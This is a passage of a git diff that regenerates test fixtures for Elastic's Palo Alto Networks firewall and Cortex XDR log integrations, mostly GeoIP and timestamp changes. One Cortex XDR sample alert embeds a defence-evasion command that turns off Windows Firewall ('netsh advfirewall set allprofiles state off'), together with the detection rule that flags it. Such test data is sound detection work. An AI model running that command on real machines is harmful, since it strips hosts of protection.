@@ -15604,7 +15139,7 @@ }, "event": { "duration": 12000000000, - "ingested": "2021-12-09T13:44:05.031920700Z", + "ingested": "2021-12-14T14:51:01.287251838Z", "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24262,1,52493,443,30799,443,0x40001c,tcp,allow,556,276,280,8,2018/11/30 16:09:20,12,any,0,32091204,0x0,192.168.0.0-192.168.255.255,United States,0,4,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", @@ -15632,26 +15167,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 172, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -15773,7 +15303,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031926100Z", + "ingested": "2021-12-14T14:51:01.287252213Z", "original": "Nov 30 16:09:51 PA-220 1,2018/11/30 16:09:51,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:51,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:51,24281,1,59320,53,13490,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:18,0,any,0,32091205,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:51.000-05:00", "timezone": "America/New_York", @@ -15801,26 +15331,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 0, "bytes": 588, - "ip": "175.16.199.1", - "packets": 6 + "packets": 6, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -15933,7 +15458,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031931400Z", + "ingested": "2021-12-14T14:51:01.287252562Z", "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24424,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:37,0,any,0,32091206,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:52.000-05:00", "timezone": "America/New_York", 
@@ -15961,26 +15486,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 94, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -16102,7 +15622,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031936800Z", + "ingested": "2021-12-14T14:51:01.287252907Z", "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24230,1,13076,53,53751,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091207,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:52.000-05:00", "timezone": "America/New_York", @@ -16130,26 +15650,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 170, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -16271,7 +15786,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031942300Z", + "ingested": "2021-12-14T14:51:01.287253250Z", "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24243,1,5511,53,21643,53,0x400019,udp,allow,242,72,170,2,2018/11/30 16:09:19,0,any,0,32091208,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:52.000-05:00", "timezone": "America/New_York", @@ -16299,26 +15814,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 94, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -16440,7 +15950,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031947700Z", + "ingested": "2021-12-14T14:51:01.287253595Z", "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24077,1,9799,53,22446,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091209,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:52.000-05:00", "timezone": "America/New_York", 
@@ -16468,26 +15978,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 94, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -16609,7 +16114,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031953Z", + "ingested": "2021-12-14T14:51:01.287254013Z", "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24266,1,39169,53,22301,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091210,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:52.000-05:00", "timezone": "America/New_York", @@ -16637,26 +16142,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 166, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -16778,7 +16278,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031958300Z", + "ingested": "2021-12-14T14:51:01.287254360Z", "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24269,1,42476,53,58124,53,0x400019,udp,allow,238,72,166,2,2018/11/30 16:09:19,0,any,0,32091211,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:52.000-05:00", "timezone": "America/New_York", diff --git a/packages/panw/manifest.yml b/packages/panw/manifest.yml index 0ed7312882c..574ebb118dd 100644 --- a/packages/panw/manifest.yml +++ b/packages/panw/manifest.yml @@ -1,6 +1,6 @@ name: panw title: Palo Alto Networks Logs -version: 1.3.1 +version: 1.3.2 release: ga description: Collect PAN-OS firewall monitoring logs from Palo Alto Networks devices with Elastic Agent. type: integration diff --git a/packages/panw_cortex_xdr/changelog.yml b/packages/panw_cortex_xdr/changelog.yml index 5b24b1bec12..a7de1d15d7a 100644 --- a/packages/panw_cortex_xdr/changelog.yml +++ b/packages/panw_cortex_xdr/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.2.6" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.2.5" changes: - description: Change test public IPs to the supported subset diff --git a/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr-bioc.log-expected.json b/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr-bioc.log-expected.json index 7a8dcaaad14..97ce79bd2fe 100644 --- a/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr-bioc.log-expected.json 
+++ b/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr-bioc.log-expected.json 
@@ -588,7 +588,7 @@ "event": { "severity": 2, "reason": "Bioc Event", - "ingested": "2021-12-09T13:44:33.260263600Z", + "ingested": "2021-12-14T14:54:06.982155501Z", "original": "{\"external_id\":\"52517f58-0201-4d66-b5c4-00922664737e\",\"severity\":\"low\",\"matching_status\":\"MATCHED\",\"end_match_attempt_ts\":1588792761983,\"local_insert_ts\":1588792547132,\"matching_service_rule_id\":null,\"attempt_counter\":1,\"bioc_category_enum_key\":\"TAMPERING\",\"is_whitelisted\":false,\"starred\":false,\"deduplicate_tokens\":null,\"filter_rule_id\":null,\"mitre_technique_id_and_name\":[\"T1089 - Disabling Security Tools\"],\"mitre_tactic_id_and_name\":[\"TA0005 - Defense Evasion\"],\"agent_version\":null,\"agent_device_domain\":null,\"agent_fqdn\":null,\"agent_os_type\":\"Windows\",\"agent_os_sub_type\":\"Windows 10 [10.0 (Build 17763)]\",\"agent_data_collection_status\":null,\"mac\":null,\"events\": {\"agent_install_type\":\"STANDARD\",\"agent_host_boot_time\":null,\"event_sub_type\":null,\"module_id\":null,\"association_strength\":null,\"dst_association_strength\":null,\"story_id\":null,\"event_id\":\"AAABcetp1dDSqW1uAAY8Vw==\",\"event_type\":\"Registry Event\",\"event_timestamp\":1588792514182,\"actor_process_instance_id\":\"AdYj2qtgRtAAADjMAAAAAA==\",\"actor_process_image_path\":\"C:\\\\Windows\\\\System32\\\\netsh.exe\",\"actor_process_image_name\":\"netsh.exe\",\"actor_process_command_line\":\"netsh advfirewall set allprofiles state off\",\"actor_process_signature_status\":\"Signed\",\"actor_process_signature_vendor\":\"Microsoft 
Corporation\",\"actor_process_image_sha256\":\"d70d165b6706c61c56f2ca91307f4bbdb9846acae1da3cfd84bf978ffb21af23\",\"actor_process_image_md5\":null,\"actor_process_causality_id\":\"AdYj2qf+65AAADfkAAAAAA==\",\"actor_causality_id\":\"AdYj2qf+65AAADfkAAAAAA==\",\"actor_process_os_pid\":14540,\"actor_thread_thread_id\":null,\"causality_actor_process_image_name\":\"cmd.exe\",\"causality_actor_process_command_line\":\"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\" \",\"causality_actor_process_image_path\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"causality_actor_process_signature_vendor\":\"Microsoft Corporation\",\"causality_actor_process_signature_status\":\"Signed\",\"causality_actor_causality_id\":\"AdYj2qf+65AAADfkAAAAAA==\",\"causality_actor_process_execution_time\":1588792508244,\"causality_actor_process_image_md5\":null,\"causality_actor_process_image_sha256\":\"3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2\",\"action_file_path\":null,\"action_file_name\":null,\"action_file_md5\":null,\"action_file_sha256\":null,\"action_file_macro_sha256\":null,\"action_registry_data\":\"0\",\"action_registry_key_name\":\"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\DomainProfile\",\"action_registry_value_name\":\"EnableFirewall\",\"action_registry_full_key\":\"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\DomainProfile\\\\EnableFirewall\",\"action_local_ip\":null,\"action_local_port\":null,\"action_remote_ip\":null,\"action_remote_port\":null,\"action_external_hostname\":null,\"action_country\":null,\"action_process_instance_id\":null,\"action_process_causality_id\":null,\"action_process_image_name\":null,\"action_process_image_sha256\":null,\"action_process_image_command_line\":null,\"action_process_signature_status\":\"N/A\",\"action_process_signature_vendor\":\"N/A\",\"os_actor_effective_username\":null,\"os_actor_process_instance_id
\":\"AdYjqC34sn8AAAcIAAAAAA==\",\"os_actor_process_image_path\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"os_actor_process_image_name\":\"svchost.exe\",\"os_actor_process_command_line\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k LocalServiceNoNetworkFirewall -p\",\"os_actor_process_signature_status\":\"N/A\",\"os_actor_process_signature_vendor\":\"N/A\",\"os_actor_process_image_sha256\":\"7fd065bac18c5278777ae44908101cdfed72d26fa741367f0ad4d02020787ab6\",\"os_actor_process_causality_id\":\"AdYjqC34sn8AAAcIAAAAAA==\",\"os_actor_causality_id\":null,\"os_actor_process_os_pid\":\"1800\",\"os_actor_thread_thread_id\":null,\"fw_app_id\":null,\"fw_interface_from\":null,\"fw_interface_to\":null,\"fw_rule\":null,\"fw_rule_id\":null,\"fw_device_name\":null,\"fw_serial_number\":null,\"fw_url_domain\":null,\"fw_email_subject\":null,\"fw_email_sender\":null,\"fw_email_recipient\":null,\"fw_app_subcategory\":null,\"fw_app_category\":null,\"fw_app_technology\":null,\"fw_vsys\":null,\"fw_xff\":null,\"fw_misc\":null,\"fw_is_phishing\":\"N/A\",\"dst_agent_id\":null,\"dst_causality_actor_process_execution_time\":null,\"dns_query_name\":null,\"dst_action_external_hostname\":null,\"dst_action_country\":null,\"dst_action_external_port\":null,\"contains_featured_host\":null,\"contains_featured_user\":null,\"contains_featured_ip\":null,\"image_name\":null,\"container_id\":null,\"cluster_name\":null,\"user_name\":\"NT AUTHORITY\\\\LOCAL SERVICE\"},\"alert_id\":\"884236\",\"detection_timestamp\":1588792514182,\"name\":\"Windows Firewall disabled via Registry\",\"category\":\"Tampering\",\"endpoint_id\":\"98a86ba773fbe44f6b41ba2216fe2f53\",\"description\":[{\"pretty_name\":\"Registry\",\"data_type\":null,\"render_type\":\"entity\",\"entity_map\":null,\"dml_ui\":false},{\"pretty_name\":\"action 
type\",\"data_type\":\"ENUM\",\"render_type\":\"attribute\",\"entity_map\":\"action\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"action\"},{\"pretty_name\":\"Create Key\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"action\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Set Value\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"action\"},{\"pretty_name\":\"AND\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"key name\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"attributes\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"attributes\"},{\"pretty_name\":\"*system\\\\*\\\\services\\\\sharedaccess\\\\parameters\\\\firewallpolicy\\\\*\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"attributes\"},{\"pretty_name\":\"AND\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"data\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"attributes\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"attributes\"},{\"pretty_name\":\"0\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"attributes\"},{\"pretty_name\":\"AND\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"value 
name\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"attributes\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"attributes\"},{\"pretty_name\":\"donotallowexceptions\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"attributes\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"enablefirewall\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"attributes\"},{\"pretty_name\":\"Process\",\"data_type\":null,\"render_type\":\"entity\",\"entity_map\":null,\"dml_ui\":false},{\"pretty_name\":\"name\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_actor\",\"dml_type\":null},{\"pretty_name\":\"!=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\"svchost.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"dllhost.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"mmc.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"sihost.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"cgo 
name\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_causality_actor\",\"dml_type\":null},{\"pretty_name\":\"!=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\"svchost.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"dllhost.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"mmc.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"sihost.exe\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\"AND\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"signature\",\"data_type\":\"ENUM\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_actor\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\"Signed\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Unsigned\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"N/A\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Invalid 
Signature\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Weak Hash\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"cgo signature\",\"data_type\":\"ENUM\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_causality_actor\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\"Signed\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Unsigned\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"N/A\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Invalid Signature\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Weak Hash\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\"AND\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"signer\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_actor\",\"dml_type\":null},{\"pretty_name\":\"!=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\"Symantec 
Corporation\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"CyberArk Software Ltd.\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"McAfee, Inc.\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Kaspersky Lab\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Avira Operations GmbH \u0026 Co. KG\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"F-Secure Corporation\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"cgo signer\",\"data_type\":\"TEXT\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_causality_actor\",\"dml_type\":null},{\"pretty_name\":\"!=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\"Symantec Corporation\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"CyberArk Software Ltd.\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"McAfee, 
Inc.\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Kaspersky Lab\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"Avira Operations GmbH \u0026 Co. KG\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"F-Secure Corporation\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"IBM Corporation\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_actor\"},{\"pretty_name\":\",\",\"data_type\":null,\"render_type\":\"connector\",\"entity_map\":null},{\"pretty_name\":\"IBM Corporation\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_causality_actor\"},{\"pretty_name\":\"Host\",\"data_type\":null,\"render_type\":\"entity\",\"entity_map\":null,\"dml_ui\":false},{\"pretty_name\":\"host os\",\"data_type\":\"ENUM\",\"render_type\":\"attribute\",\"entity_map\":\"xdr_agent\",\"dml_type\":null},{\"pretty_name\":\"=\",\"data_type\":null,\"render_type\":\"operator\",\"entity_map\":\"xdr_agent\"},{\"pretty_name\":\"windows\",\"data_type\":null,\"render_type\":\"value\",\"entity_map\":\"xdr_agent\"}],\"host_ip\":[\"192.168.88.1\",\"192.168.153.1\",\"10.10.10.10\"],\"host_name\":\"testhostname-123\",\"mac_addresses\":null,\"source\":\"XDR BIOC\",\"action\":\"DETECTED\",\"action_pretty\":\"Detected\"}", "kind": "alert", "created": "2020-05-06T19:15:14.182Z", 
diff --git a/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr.log-expected.json b/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr.log-expected.json
index d00123405c3..37b5665ab62 100644
--- a/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr.log-expected.json
+++ b/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr.log-expected.json
@@ -52,19 +52,14 @@
